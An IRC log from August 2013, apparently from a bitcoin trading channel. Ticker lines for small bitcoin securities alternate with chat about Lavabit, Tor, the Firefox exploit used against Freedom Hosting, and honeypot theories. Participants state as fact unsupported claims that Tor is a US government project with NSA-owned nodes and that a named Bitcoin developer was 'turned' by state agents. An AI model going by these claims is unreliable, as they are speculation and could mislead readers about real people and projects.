= 0.7499 BTC [-] Aug 09 04:48:03 I just want to talk about this price dip with some jabrones. Aug 09 04:48:08 no, really I do think so. You have a way with words, it is a talent Aug 09 04:48:14 why ty. Aug 09 04:48:33 Kleeck_ the best you can come to that i guess would be people like ThickAsThieves Aug 09 04:48:46 he's on the board and running some investor polling questions thing Aug 09 04:48:54 [BTCTC] [LABCOIN] 9 @ 0.001404 = 0.0126 BTC [+] Aug 09 04:48:55 https://lavabit.com/ Aug 09 04:48:59 Lavabit Aug 09 04:49:07 [BTCTC] [ACTIVEMINING] 4 @ 0.005207 = 0.0208 BTC [-] Aug 09 04:49:17 Gah. That guy is a lousy sock puppet! (<3 TAT) Aug 09 04:49:28 sadness. sadness. Aug 09 04:49:36 [BTCTC] [BITVPS] 32 @ 0.002101 = 0.0672 BTC [+] Aug 09 04:49:37 [BTCTC] [BITVPS] 5 @ 0.0021 = 0.0105 BTC [-] Aug 09 04:49:38 [BTCTC] [BITVPS] 10 @ 0.00203 = 0.0203 BTC [-] Aug 09 04:49:39 [BTCTC] [BITVPS] 100 @ 0.002 = 0.2 BTC [-] Aug 09 04:49:41 [BTCTC] [BITVPS] 25 @ 0.001901 = 0.0475 BTC [-] Aug 09 04:49:42 [BTCTC] [BITVPS] 18 @ 0.0019 = 0.0342 BTC [-] Aug 09 04:49:43 [BTCTC] [BITVPS] 10 @ 0.0019 = 0.019 BTC [-] Aug 09 04:50:15 "I would _strongly_ recommend against anyone trusting their private data to a company with physical ties to the United States." Aug 09 04:50:39 [BTCTC] [ACTIVEMINING] 30 @ 0.005105 = 0.1532 BTC [-] Aug 09 04:50:41 [BTCTC] [ACTIVEMINING] 1 @ 0.005104 BTC [-] Aug 09 04:50:41 What was lavabit? Aug 09 04:50:54 the email provider for snowden Aug 09 04:50:58 Ah... Aug 09 04:51:02 Why is he NOT on TOR? Aug 09 04:51:04 o_o Aug 09 04:51:06 TORMAIL? Aug 09 04:51:26 Linux + TORMAIL = FREEEEEEEDOM! Aug 09 04:51:38 [BTCTC] [ACTIVEMINING] 30 @ 0.005203 = 0.1561 BTC [+] Aug 09 04:51:40 tormail = freedomhost, no? Aug 09 04:51:46 lulz Aug 09 04:51:48 optimator yeah we were discussing earlier Aug 09 04:51:51 [BTCTC] [ACTIVEMINING] 68 @ 0.005108 = 0.3473 BTC [-] Aug 09 04:51:53 [BTCTC] [ACTIVEMINING] 1 @ 0.005107 BTC [-] Aug 09 04:52:03 off the back - then :) Aug 09 04:52:07 Kleeck_ you must have missed the memo on that. Aug 09 04:52:20 I did not. Aug 09 04:52:29 [HAVELOCK] [XBOND] 22 @ 0.0010305 = 0.0227 BTC [-] Aug 09 04:52:56 omg surprise sarcasm Aug 09 04:53:08 Get informed: http://www.itworld.com/software/367979/tor-project-stop-using-windows-disable-javascript Aug 09 04:53:13 The issue wasn't TOR, it was Java. Aug 09 04:54:03 [BTCTC] [LABCOIN] 30 @ 0.001412 = 0.0424 BTC [+] Aug 09 04:54:18 Kleeck_: everything is as strong as it's weakest link - not everyone realizes that Aug 09 04:54:32 or what the weak link is.... Aug 09 04:54:54 Agreed. Aug 09 04:55:09 [HAVELOCK] [XBOND] 28 @ 0.0010301 = 0.0288 BTC [-] Aug 09 04:55:19 But for real. You can have some goddamn secure OS run TOR and e-mail the shit out of some Govs. Aug 09 04:55:49 [BTCTC] [ACTIVEMINING] 30 @ 0.005118 = 0.1535 BTC [+] Aug 09 04:55:50 [BTCTC] [ACTIVEMINING] 50 @ 0.005107 = 0.2554 BTC [-] Aug 09 04:55:52 [BTCTC] [ACTIVEMINING] 700 @ 0.005017 = 3.5119 BTC [-] Aug 09 04:55:53 [BTCTC] [ACTIVEMINING] 500 @ 0.005016 = 2.508 BTC [-] Aug 09 04:55:54 [BTCTC] [ACTIVEMINING] 487 @ 0.005016 = 2.4428 BTC [-] Aug 09 04:56:02 separate issues. on one hand java, on the other tor. Aug 09 04:56:31 has anybody considered how easy it is to run arbitrarily many doctored TOR exit nodes? Aug 09 04:56:41 well since security is added on top of the transport layer - it means that everyone needs to be an expert Aug 09 04:56:41 yes/ Aug 09 04:56:47 all tor nodes are sniffed Aug 09 04:57:12 only reason anyone runs them Aug 09 04:57:54 [BTCTC] [ASICMINER-PT] 1 @ 3.47 BTC [+] Aug 09 04:57:55 [BTCTC] [ASICMINER-PT] 1 @ 3.471 BTC [+] Aug 09 04:57:56 Menoetius: sniffing is only half the fun Aug 09 04:58:02 one can also inject. Aug 09 04:58:16 i was just putting it in simple terms ;D Aug 09 04:58:51 [BTCTC] [ACTIVEMINING] 22 @ 0.005023 = 0.1105 BTC [+] Aug 09 04:59:16 People are confused about what "TOR IS DOWN!" means. There was a dude in Ireland and a couple other exit nodes, takesn down. This was done through a vulnerability in a mozilla firefox build from nov. 2012. TOR is not down. Just to be clear. Aug 09 04:59:47 only reason anyone runs them <<< word. Aug 09 05:00:13 do people really think "tor is down"? lol Aug 09 05:00:25 that's as stupid as saying "bitcoin is dead", because mtgox dwolla is seized Aug 09 05:00:41 that's the buzz, dexX7. Aug 09 05:00:57 [BTCTC] [ASICMINER-PT] 1 @ 3.474 BTC [+] Aug 09 05:01:14 dexX7: the 'honeypot-by-design' hypothesis is considerably stronger for TOR than for Bitcoin. Aug 09 05:01:24 dexX7 that analogy is very inept. Aug 09 05:01:30 well yea, but that's a different topic Aug 09 05:02:11 [HAVELOCK] [AM100] 1 @ 0.0359 BTC [+] Aug 09 05:02:19 why is that, mp? Aug 09 05:02:32 someone has a honeypot theory for btc ? Aug 09 05:02:42 how would that even work Aug 09 05:02:44 i wouldn't know where to begin. Aug 09 05:02:55 someone has a honeypot theory for TOR? I'd like to hear more. Aug 09 05:02:58 suppose instead of trying to get me to argue your points you come up with an actual support for the analogy Aug 09 05:03:06 outside of "they both have names" or "internet" Aug 09 05:03:17 [BTCTC] [LABCOIN] 7 @ 0.001406 = 0.0098 BTC [-] Aug 09 05:03:45 What is this "honey pot theory" for TOR? Aug 09 05:03:52 Kleeck_ not so much of a theory. it's a project run by the usg to give its various enemies trouble. Aug 09 05:04:08 Go on. What exactly are we talking about? Aug 09 05:04:13 "someone has a honeypot theory for btc" - I have a tor exist node available for sniffing injecting - .5 btc - wanna pay? Aug 09 05:04:45 optimator what ? Aug 09 05:04:57 pay me - i then trace the shit out of the btc address you pay from Aug 09 05:05:01 this is progressing nicely. Aug 09 05:05:17 tor is the underlying protocol and freedom host was a service using/on tor - you can remove the host, but that doesn't change anything about tor itself Aug 09 05:05:20 lol. - You realize how TOR works right? End-to-end encryption from node-to-node all the way to the exit. Tracking output from the exit node does little to no good unless you are tracking a lot of other data. Aug 09 05:05:23 and that does what optimator ? Aug 09 05:05:32 tell me somoene sent me btc then i sent you btc Aug 09 05:05:35 well done Aug 09 05:05:40 i could of told you that Aug 09 05:05:45 dexX7 you mean onion is the protocol ? Aug 09 05:06:30 [HAVELOCK] [XBOND] 19 @ 0.0010301 = 0.0196 BTC [-] Aug 09 05:06:55 [BTCTC] [LABCOIN] 30 @ 0.001384 = 0.0415 BTC [-] Aug 09 05:06:57 Anyways... How about that Snowden character? Aug 09 05:06:57 [BTCTC] [LABCOIN] 20 @ 0.001383 = 0.0277 BTC [-] Aug 09 05:06:58 [BTCTC] [LABCOIN] 16 @ 0.001366 = 0.0219 BTC [-] Aug 09 05:06:59 [BTCTC] [LABCOIN] 50 @ 0.001365 = 0.0683 BTC [-] Aug 09 05:07:00 Kleeck_ the vulnerabilities are well documented tho. Aug 09 05:07:00 [BTCTC] [LABCOIN] 1000 @ 0.001363 = 1.363 BTC [-] Aug 09 05:07:01 [BTCTC] [LABCOIN] 77 @ 0.001361 = 0.1048 BTC [-] Aug 09 05:07:02 [BTCTC] [LABCOIN] 600 @ 0.00136 = 0.816 BTC [-] Aug 09 05:07:03 [BTCTC] [LABCOIN] 10 @ 0.00136 = 0.0136 BTC [-] Aug 09 05:07:04 [BTCTC] [LABCOIN] 10 @ 0.00136 = 0.0136 BTC [-] Aug 09 05:07:05 [BTCTC] [LABCOIN] 1643 @ 0.001357 = 2.2296 BTC [-] Aug 09 05:07:05 [BTCTC] [LABCOIN] 2000 @ 0.001356 = 2.712 BTC [-] Aug 09 05:07:06 [BTCTC] [LABCOIN] 4144 @ 0.001355 = 5.6151 BTC [-] Aug 09 05:07:07 [BTCTC] [LABCOIN] 7000 @ 0.001355 = 9.485 BTC [-] Aug 09 05:07:27 I haven't come across a technical artical outlining documented TOR vulns. Aug 09 05:07:37 I've read news articles about shitty browser exploits... Aug 09 05:07:40 Menoetius: it's the combination of the exit node + attack vectors Aug 09 05:07:52 im confused what your even talkign about optimator Aug 09 05:07:54 quite a few people need to go back and learn the basics of crypto before they try to understand a widget like TOR Aug 09 05:08:03 ^ Aug 09 05:08:35 like, how exactly is 'end to end encryption' supposed to save you if the enemy controls one of the endpoints Aug 09 05:08:37 I feel that if people understood crypto better we would understand the security that TOR brings, and the possible exploits and various points of entry. Aug 09 05:08:41 "he 'honeypot-by-design' hypothesis is considerably stronger for TOR than for Bitcoin." Aug 09 05:09:14 oh god, , I never thought people would not understand how end-to-end would protect you from that... Aug 09 05:09:23 [HAVELOCK] [XBOND] 1 @ 0.00103002 BTC [-] Aug 09 05:09:25 [HAVELOCK] [XBOND] 930 @ 0.00103001 = 0.9579 BTC [-] Aug 09 05:09:28 i was question the fact anyone has even suggested btc was a honeypot Aug 09 05:09:28 [BTCTC] [PAJKA.BOND] 2 @ 0.012 = 0.024 BTC [-] Aug 09 05:09:46 Menoetius: I've suggested it. And so have many other people. Aug 09 05:09:55 how would that work then ? Aug 09 05:10:23 way to much plausible deniability for an effective honeypot Aug 09 05:10:26 [BTCTC] [ACTIVEMINING] 5 @ 0.00515 = 0.0258 BTC [+] Aug 09 05:10:31 there are mathematical methods of carrying on a blockchain-like affair without keeping a trawlable ledger of every transaction. Aug 09 05:10:36 and BTC doesn't use them. Aug 09 05:10:39 [HAVELOCK] [LABCO] 1 @ 0.0013 BTC [-] Aug 09 05:10:44 I have a coworker that has also thought that BTC could be calculated rainbow tables. Aug 09 05:11:03 Kleeck_ that's nonsense. Egerstad for instance gathered a ton of people's pws. Aug 09 05:11:12 there was also the french team that infiltrated most of ithe network. Aug 09 05:11:25 It wasn't my idea. Aug 09 05:11:29 tor is about as useful for security as ripple is for cryptocurrency Aug 09 05:11:31 [BTCTC] [ASICMINER-PT] 1 @ 3.473 BTC [-] Aug 09 05:11:39 TOR is much more secure than that... Aug 09 05:11:44 lol Aug 09 05:11:49 Terrible analogy. Aug 09 05:11:57 pretty solid analogy actuyally. Aug 09 05:12:03 TOR is fairly secure against people who aren't its pwners. Aug 09 05:12:05 This is why the BTC community needs informed on crypto. Aug 09 05:12:19 you're here arguing that a laughable piece of schewizer which has in fact been raped to all hell multiple times, Aug 09 05:12:20 Menoetius: i was suggesting the honey pot in two ways. 1) get neferious person to give you btc, then analyze the address it came from; and 2) tor attack via something like - www.mit.edu/~ecprice/papers/tor.pdf Aug 09 05:12:21 most recently last week Aug 09 05:12:32 [BTCTC] [BTCGARDEN] 20 @ 0.01554 = 0.3108 BTC [+] Aug 09 05:12:32 is somehow to be taken seriously. Aug 09 05:12:41 TOR has not been raped to hell. /sigh... So much misunderstanding... Aug 09 05:12:47 w/e. Aug 09 05:12:54 [BTCTC] [TAT.ASICMINER] 3 @ 0.03447 = 0.1034 BTC [-] Aug 09 05:12:55 [BTCTC] [TAT.ASICMINER] 4 @ 0.03448 = 0.1379 BTC [+] Aug 09 05:13:00 you may have a point arguing there may be some redeemable value in onion routing. Aug 09 05:13:03 tor however is not it. Aug 09 05:13:09 same situation as ripple actually. Aug 09 05:13:31 No, no, no... There is some redeemable value in using Mozilla over TOR... You have your analysis backwards... Aug 09 05:13:50 mircea_popescu: there are quite a few serious problems with TOR, possibly including most of the nodes being NSA-owned. But last week's events had nothing to do with this. Aug 09 05:14:05 [BTCTC] [TAT.ASICMINER] 26 @ 0.03448 = 0.8965 BTC [+] Aug 09 05:14:15 asciilifeform nothing may be too strong a word. Aug 09 05:14:21 [BTCTC] [ASICMINER-PT] 1 @ 3.407 BTC [-] Aug 09 05:14:23 [BTCTC] [ASICMINER-PT] 3 @ 3.406 = 10.218 BTC [-] Aug 09 05:14:24 [BTCTC] [ASICMINER-PT] 5 @ 3.403 = 17.015 BTC [-] Aug 09 05:15:12 Sure, you can conspiracy theory a lot of scary scenarios, but as we understand TOR it is a very well thought out network. It's the methods of connectivity that are vulnerable, and a few other points of injection/observation, that don't involve the TOR network at all. Aug 09 05:15:12 mircea_popescu: nothing happened that would have required pwning the network. What we got was a perfectly-ordinary server compromise. Aug 09 05:15:33 the gestapo probably got the login creds from a stoolie Aug 09 05:15:39 It was a Mozilla expoit... Aug 09 05:15:59 Here, read: http://thenextweb.com/insider/2013/08/05/mozilla-is-investigating-a-potential-security-vulnerability-within-firefox-17/ Aug 09 05:16:01 binary words are usually too strong unless you are dealing with discrete mathematics Aug 09 05:16:05 Kleeck_: that was the payload. nothing to do with the actual compromise Aug 09 05:16:29 Yes. The actual exploit is known and documented AND mozilla is looking into it! Aug 09 05:16:47 asciilifeform irrespective of the hiow, we're discussing the what. Aug 09 05:17:01 compare the gestapo's action in btc (the turning of gavin) with the gestapo's exact same action in tor. Aug 09 05:17:06 if the pwners of TOR were ready to ditch the deniability of their operation, they could have fed the same exploit to every chump connected to every exit node. Aug 09 05:17:07 one barely noticed, tyhe other died. Aug 09 05:17:35 [BTCTC] [ACTIVEMINING] 25 @ 0.005031 = 0.1258 BTC [-] Aug 09 05:17:39 I'd love to hang out longer and chat but I have to be off, gents. This is a good convo! Inform yourselves!! Aug 09 05:17:41 <3 Aug 09 05:17:58 wut? someone turned gavin? i thought he was married? Aug 09 05:18:25 http://trilema.com/2013/and-gavin-moves-on-to-the-dark-side-the-bitcoin-project-is-officially-hijacked/ Aug 09 05:18:28 And Gavin moves on to the dark side. The Bitcoin project is officially hijacked pe Trilema - Un blog Aug 09 05:19:02 [BTCTC] [DMS.MINING] 1 @ 0.004499 BTC [+] Aug 09 05:19:04 [BTCTC] [ACTIVEMINING] 30 @ 0.005124 = 0.1537 BTC [+] Aug 09 05:19:05 [BTCTC] [ACTIVEMINING] 68 @ 0.005125 = 0.3485 BTC [+] Aug 09 05:19:06 [BTCTC] [ACTIVEMINING] 13 @ 0.005126 = 0.0666 BTC [+] Aug 09 05:19:18 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.002299 BTC [+] Aug 09 05:20:00 and gavin + w/e tla agency is why litecoin still has a chance Aug 09 05:20:10 [BTCTC] [ACTIVEMINING] 25 @ 0.005163 = 0.1291 BTC [+] Aug 09 05:20:25 mircea_popescu: it remains to be seen whether the userbase can be hijacked along with the 'official' project source. Aug 09 05:20:44 my point is however, that the same exact push keeled over one of the two. Aug 09 05:20:52 they got a lot less bang for the same buck here. Aug 09 05:21:27 bitcoin has the fastidious bureaucrats of the new soviets running in the dusts of hillbilly country trying to get entry-level judges to pat them on the head. Aug 09 05:21:39 it's quite humiliating, a point i'm sure isn't lost on anyone but "the community". Aug 09 05:21:55 if the fellow making 'the offer that can't be refused' had any brains, he'd write the script for Gavin, rather than letting him mouth off ad lib. Aug 09 05:22:19 you don't get in a bureaucracy by having brains. Aug 09 05:23:07 [BTCTC] [PAJKA.BOND] 43 @ 0.012 = 0.516 BTC [-] Aug 09 05:23:08 actually a bureaucracy is rather like an organism, in that it can in fact be equipped with a brain. Aug 09 05:23:20 i've yet to see this. Aug 09 05:23:26 [BTCTC] [DMS.SELLING] 15 @ 0.0233 = 0.3495 BTC [-] Aug 09 05:23:32 the ussr had a rather effective brain until 1953 or so. Aug 09 05:23:36 at most it can turn into a shambling abomination that screeches "braaainnzzz" Aug 09 05:23:38 and a body made of bureaucrats Aug 09 05:23:41 but that'd sem different. Aug 09 05:23:46 after that it was just a body. Aug 09 05:24:38 asciilifeform re brains : Aug 09 05:24:39 Dear Comrade Stalin: Aug 09 05:24:39 You have been so rude as to summon my wife to the telephone and use bad language. Although she had told you that she was prepared to forget this, the fact nevertheless became known through her to Zinoviev and Kamenev. I have no intention of forgetting so easily what has been done against me, and it goes without saying that what has been done against my wife I consider having been done against me as well. I ask you, t Aug 09 05:24:39 herefore, to think it over whether you are prepared to withdraw what you have said and to make your apologies, or whether you prefer that relations between us should be broken off.[1] Aug 09 05:24:39 Respectfully yours, Aug 09 05:24:39 Lenin Aug 09 05:24:57 [BTCTC] [DMS.PURCHASE] 13 @ 0.02822 = 0.3669 BTC [-] Aug 09 05:25:43 mircea_popescu: modern figureheads have impeccable manners, but none have taken an agrarian shithole from plow to nuke in a few decades. Aug 09 05:25:55 a will is still not a brain. Aug 09 05:26:46 anyway, that nonsense nearly cost him his life. the entire testament of lenin affair was barely - and unlikely - averted by the actual people witgh brains. Aug 09 05:26:49 'brain' is necessary (though not sufficient) for will. Aug 09 05:26:51 they didn't make it to 53. Aug 09 05:27:25 no, actually, they're distinct. brain is the soft matter inside. will is the hard bony structures keeping the world away from it. Aug 09 05:27:27 [BTCTC] [TAT.MINIGAME] 1 @ 0.0002412 BTC [+] Aug 09 05:27:38 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1936 BTC [-] Aug 09 05:29:06 [BTCTC] [TAT.ASICMINER] 1 @ 0.03444 BTC [-] Aug 09 05:29:07 [BTCTC] [ACTIVEMINING] 1 @ 0.005223 BTC [+] Aug 09 05:29:11 [BTCTC] [TAT.ASICMINER] 4 @ 0.03445 = 0.1378 BTC [+] Aug 09 05:30:15 [MPEX] [S.MPOE] 3745 @ 0.0008415 = 3.1514 BTC [+] Aug 09 05:30:16 [MPEX] [S.MPOE] 3745 @ 0.0008415 = 3.1514 BTC [+] Aug 09 05:30:16 [BTCTC] [ACTIVEMINING] 30 @ 0.00522 = 0.1566 BTC [-] Aug 09 05:30:31 [BTCTC] [ACTIVEMINING] 11 @ 0.005226 = 0.0575 BTC [+] Aug 09 05:30:32 [BTCTC] [ACTIVEMINING] 10 @ 0.005235 = 0.0524 BTC [+] Aug 09 05:30:33 [BTCTC] [COGNITIVE] 2 @ 0.32 = 0.64 BTC [+] Aug 09 05:30:35 [BTCTC] [ACTIVEMINING] 50 @ 0.005236 = 0.2618 BTC [+] Aug 09 05:30:36 [BTCTC] [ACTIVEMINING] 98 @ 0.005255 = 0.515 BTC [+] Aug 09 05:30:37 [BTCTC] [ACTIVEMINING] 6 @ 0.005256 = 0.0315 BTC [+] Aug 09 05:30:38 [BTCTC] [ACTIVEMINING] 483 @ 0.005256 = 2.5386 BTC [+] Aug 09 05:38:11 [BTCTC] [ASICMINER-PT] 1 @ 3.401 BTC [-] Aug 09 05:41:17 [BTCTC] [ASICMINER-PT] 1 @ 3.471 BTC [+] Aug 09 05:41:27 [BTCTC] [ACTIVEMINING] 4 @ 0.005246 = 0.021 BTC [-] Aug 09 05:42:05 [BTCTC] [ACTIVEMINING] 30 @ 0.005496 = 0.1649 BTC [+] Aug 09 05:42:06 [BTCTC] [ACTIVEMINING] 26 @ 0.005497 = 0.1429 BTC [+] Aug 09 05:42:07 [BTCTC] [ACTIVEMINING] 25 @ 0.005499 = 0.1375 BTC [+] Aug 09 05:42:09 [BTCTC] [ACTIVEMINING] 125 @ 0.0055 = 0.6875 BTC [+] Aug 09 05:42:09 [BTCTC] [ACTIVEMINING] 10 @ 0.005549 = 0.0555 BTC [+] Aug 09 05:42:10 [BTCTC] [ACTIVEMINING] 50 @ 0.00555 = 0.2775 BTC [+] Aug 09 05:42:11 [BTCTC] [ACTIVEMINING] 75 @ 0.005649 = 0.4237 BTC [+] Aug 09 05:42:12 [BTCTC] [ACTIVEMINING] 225 @ 0.00565 = 1.2713 BTC [+] Aug 09 05:42:13 [BTCTC] [ACTIVEMINING] 535 @ 0.00565 = 3.0228 BTC [+] Aug 09 05:42:15 [MPEX] [S.MPOE] 2005 @ 0.00083878 = 1.6818 BTC [-] Aug 09 05:42:33 http://www.jasonvolpe.com/should-microsoft-help-nsa-exploit-vulnerabilities/ Aug 09 05:42:36 Should Microsoft Help NSA Exploit Vulnerabilities? | Jason Volpe's Blog Aug 09 05:45:25 [BTCTC] [BITVPS] 20 @ 0.002196 = 0.0439 BTC [+] Aug 09 05:48:34 [HAVELOCK] [XBOND] 1000 @ 0.00103001 = 1.03 BTC [-] Aug 09 05:48:54 [HAVELOCK] [XBOND] 70 @ 0.00103001 = 0.0721 BTC [-] Aug 09 05:49:02 [HAVELOCK] [XBOND] 129 @ 0.00103001 = 0.1329 BTC [-] Aug 09 05:49:16 [HAVELOCK] [XBOND] 551 @ 0.00103 = 0.5675 BTC [-] Aug 09 05:49:28 kakobrekla Keefe KingCoin kleeck knotwork__ KRS1 Aug 09 05:49:28 kakobrekla Keefe KingCoin kleeck knotwork__ KRS1 Aug 09 05:49:41 anyway, in all the aggitation about tor im surprised nobody mentioned tails. Aug 09 05:49:55 people with the unmitigated audacity to discuss "misinformation". heh. Aug 09 05:49:58 [HAVELOCK] [SDSTM] 1 @ 0.00560201 BTC [-] Aug 09 05:50:29 [HAVELOCK] [LABCO] 10 @ 0.00121 = 0.0121 BTC [-] Aug 09 05:50:45 [HAVELOCK] [LABCO] 40 @ 0.0012 = 0.048 BTC [-] Aug 09 05:51:12 [HAVELOCK] [SMG] 99 @ 0.0001981 = 0.0196 BTC [+] Aug 09 05:51:39 what about tails? Aug 09 05:53:28 would have provided immunity in that case, basically. Aug 09 05:53:36 [BTCTC] [ACTIVEMINING] 30 @ 0.005285 = 0.1586 BTC [-] Aug 09 05:53:36 [BTCTC] [ACTIVEMINING] 68 @ 0.005284 = 0.3593 BTC [-] Aug 09 05:53:38 [BTCTC] [ACTIVEMINING] 50 @ 0.005269 = 0.2635 BTC [-] Aug 09 05:53:39 [BTCTC] [ACTIVEMINING] 102 @ 0.005205 = 0.5309 BTC [-] Aug 09 05:54:54 yea, it's great Aug 09 05:56:52 [MPEX] [S.MPOE] 7095 @ 0.00084546 = 5.9985 BTC [+] Aug 09 05:56:57 anyway, that's all for today. take it easy all. Aug 09 05:57:05 [BTCTC] [ASICMINER-PT] 1 @ 3.461 BTC [-] **** BEGIN LOGGING AT Fri Aug 9 12:51:33 2013 Aug 09 12:54:21 [BTCTC] [LABCOIN] 2 @ 0.001361 = 0.0027 BTC [-] Aug 09 12:56:14 [HAVELOCK] [AM100] 18 @ 0.0368 = 0.6624 BTC [+] Aug 09 12:57:01 [HAVELOCK] [AM100] 135 @ 0.0368999 = 4.9815 BTC [+] Aug 09 12:57:14 [HAVELOCK] [AM100] 100 @ 0.0369 = 3.69 BTC [+] Aug 09 12:57:28 [HAVELOCK] [AM100] 150 @ 0.037 = 5.55 BTC [+] Aug 09 13:02:13 [BTCTC] [ASICMINER-PT] 1 @ 3.95 BTC [-] Aug 09 13:02:22 [BTCTC] [LABCOIN] 2 @ 0.001361 = 0.0027 BTC [-] Aug 09 13:03:18 [BTCTC] [LABCOIN] 2 @ 0.001361 = 0.0027 BTC [-] Aug 09 13:08:13 [BTCTC] [LABCOIN] 24 @ 0.001361 = 0.0327 BTC [-] Aug 09 13:08:15 [BTCTC] [LABCOIN] 2 @ 0.001361 = 0.0027 BTC [-] Aug 09 13:09:28 [BTCTC] [TAT.ASICMINER] 6 @ 0.03889 = 0.2333 BTC [-] Aug 09 13:11:16 [BTCTC] [LABCOIN] 29 @ 0.001344 = 0.039 BTC [-] Aug 09 13:11:17 [BTCTC] [LABCOIN] 2 @ 0.001311 = 0.0026 BTC [-] Aug 09 13:11:19 [BTCTC] [LABCOIN] 19 @ 0.00131 = 0.0249 BTC [-] Aug 09 13:11:20 [BTCTC] [LABCOIN] 7 @ 0.001309 = 0.0092 BTC [-] Aug 09 13:11:21 [BTCTC] [LABCOIN] 60 @ 0.001308 = 0.0785 BTC [-] Aug 09 13:11:22 [BTCTC] [LABCOIN] 117 @ 0.001306 = 0.1528 BTC [-] Aug 09 13:12:14 [BTCTC] [LABCOIN] 30 @ 0.001307 = 0.0392 BTC [+] Aug 09 13:12:27 [BTCTC] [LABCOIN] 3 @ 0.001306 = 0.0039 BTC [-] Aug 09 13:12:29 [BTCTC] [ACTIVEMINING] 1 @ 0.005696 BTC [+] Aug 09 13:12:31 [BTCTC] [LABCOIN] 960 @ 0.001306 = 1.2538 BTC [-] Aug 09 13:12:35 and now it came to btct.. people putting asks for CB.IDIFF-O way above max payout Aug 09 13:14:07 i'll erect ask wall at 0.00999 and use that as practically interest-free loan Aug 09 13:17:41 [BTCTC] [BTCGARDEN] 20 @ 0.0156 = 0.312 BTC [-] Aug 09 13:18:28 [BTCTC] [BTCGARDEN] 130 @ 0.0156 = 2.028 BTC [-] Aug 09 13:18:56 [BTCTC] [TAT.ASICMINER] 14 @ 0.0381 = 0.5334 BTC [-] Aug 09 13:20:57 makes sense. Aug 09 13:22:18 [BTCTC] [BTCGARDEN] 2795 @ 0.0156 = 43.602 BTC [-] Aug 09 13:22:20 [BTCTC] [BTCGARDEN] 2 @ 0.0156 = 0.0312 BTC [-] Aug 09 13:28:26 [HAVELOCK] [AM100] 4 @ 0.0356891 = 0.1428 BTC [-] Aug 09 13:33:46 [BTCTC] [COGNITIVE] 3 @ 0.399 = 1.197 BTC [+] Aug 09 13:36:24 [HAVELOCK] [LABCO] 271 @ 0.0012 = 0.3252 BTC [-] Aug 09 13:39:11 [BTCTC] [COGNITIVE] 2 @ 0.4 = 0.8 BTC [+] Aug 09 13:39:13 [BTCTC] [COGNITIVE] 4 @ 0.4 = 1.6 BTC [+] Aug 09 13:39:14 [BTCTC] [COGNITIVE] 1 @ 0.4 BTC [+] Aug 09 13:48:27 [BTCTC] [TAT.ASICMINER] 2 @ 0.03889 = 0.0778 BTC [+] Aug 09 13:48:28 [BTCTC] [ASICMINER-PT] 1 @ 3.86 BTC [-] Aug 09 13:48:30 [BTCTC] [ASICMINER-PT] 1 @ 3.85 BTC [-] Aug 09 13:48:32 [BTCTC] [ASICMINER-PT] 3 @ 3.819 = 11.457 BTC [-] Aug 09 13:48:33 [BTCTC] [ASICMINER-PT] 1 @ 3.818 BTC [-] Aug 09 13:48:34 [BTCTC] [ASICMINER-PT] 5 @ 3.806 = 19.03 BTC [-] Aug 09 13:48:34 [BTCTC] [ASICMINER-PT] 10 @ 3.805 = 38.05 BTC [-] Aug 09 13:50:17 [BTCTC] [TAT.VIRTUALMINE] 530 @ 0.002198 = 1.1649 BTC [-] Aug 09 14:00:43 [HAVELOCK] [XBOND] 10 @ 0.00104689 = 0.0105 BTC [-] Aug 09 14:01:39 [BTCTC] [TAT.ASICMINER] 1 @ 0.03889 BTC [+] Aug 09 14:07:43 ;;later tell thickasthieves hey, what'd be your estimate of the total asicminer hash delivered to customers ? Aug 09 14:07:43 The operation succeeded. Aug 09 14:10:50 [BTCTC] [ASICMINER-PT] 5 @ 3.919 = 19.595 BTC [+] Aug 09 14:10:59 [BTCTC] [TAT.ASICMINER] 4 @ 0.039 = 0.156 BTC [+] Aug 09 14:11:53 [BTCTC] [TAT.ASICMINER] 21 @ 0.039 = 0.819 BTC [+] Aug 09 14:11:53 [BTCTC] [TAT.ASICMINER] 1 @ 0.0389 BTC [-] Aug 09 14:14:09 [BTCTC] [TAT.ASICMINER] 1 @ 0.0394 BTC [+] Aug 09 14:15:45 [BTCTC] [TAT.ASICMINER] 29 @ 0.0394 = 1.1426 BTC [+] Aug 09 14:16:22 [BTCTC] [LABCOIN] 30 @ 0.001307 = 0.0392 BTC [+] Aug 09 14:16:24 [BTCTC] [LABCOIN] 20 @ 0.001306 = 0.0261 BTC [-] Aug 09 14:16:25 [BTCTC] [LABCOIN] 950 @ 0.001305 = 1.2398 BTC [-] Aug 09 14:17:00 [BTCTC] [TAT.ASICMINER] 2 @ 0.0396 = 0.0792 BTC [+] Aug 09 14:24:42 [MPEX] [S.MPOE] 3150 @ 0.00083476 = 2.6295 BTC [+] Aug 09 14:25:27 The second FAQ for IceDrill.ASIC, https://bitcointalk.org/index.php?topic=269216.msg2897455#msg2897455 Aug 09 14:30:22 deadterra, have you read today's log? any comment? Aug 09 14:30:27 [HAVELOCK] [AM100] 32 @ 0.035 = 1.12 BTC [-] Aug 09 14:30:32 [BTCTC] [TAT.ASICMINER] 37 @ 0.03955 = 1.4634 BTC [-] Aug 09 14:31:09 [BTCTC] [COGNITIVE] 3 @ 0.4167 = 1.2501 BTC [+] Aug 09 14:31:10 [BTCTC] [COGNITIVE] 1 @ 0.4167 BTC [+] Aug 09 14:31:11 [BTCTC] [COGNITIVE] 3 @ 0.424 = 1.272 BTC [+] Aug 09 14:31:13 [BTCTC] [COGNITIVE] 4 @ 0.426 = 1.704 BTC [+] Aug 09 14:31:14 [BTCTC] [COGNITIVE] 1 @ 0.435 BTC [+] Aug 09 14:31:14 [BTCTC] [COGNITIVE] 2 @ 0.44 = 0.88 BTC [+] Aug 09 14:31:15 [BTCTC] [COGNITIVE] 3 @ 0.4438 = 1.3314 BTC [+] Aug 09 14:31:16 [BTCTC] [COGNITIVE] 1 @ 0.46 BTC [+] Aug 09 14:31:17 [BTCTC] [COGNITIVE] 3 @ 0.46 = 1.38 BTC [+] Aug 09 14:31:20 [BTCTC] [COGNITIVE] 29 @ 0.465 = 13.485 BTC [+] Aug 09 14:31:21 [BTCTC] [COGNITIVE] 3 @ 0.475 = 1.425 BTC [+] Aug 09 14:31:22 Yes, I have read it :) Aug 09 14:31:22 [BTCTC] [COGNITIVE] 1 @ 0.4759 BTC [+] Aug 09 14:31:34 [HAVELOCK] [AM100] 2 @ 0.034 = 0.068 BTC [-] Aug 09 14:31:36 [HAVELOCK] [AM100] 4 @ 0.034 = 0.136 BTC [-] Aug 09 14:31:36 We work on FAQ basis so we will keep posting as we formulate answers to the 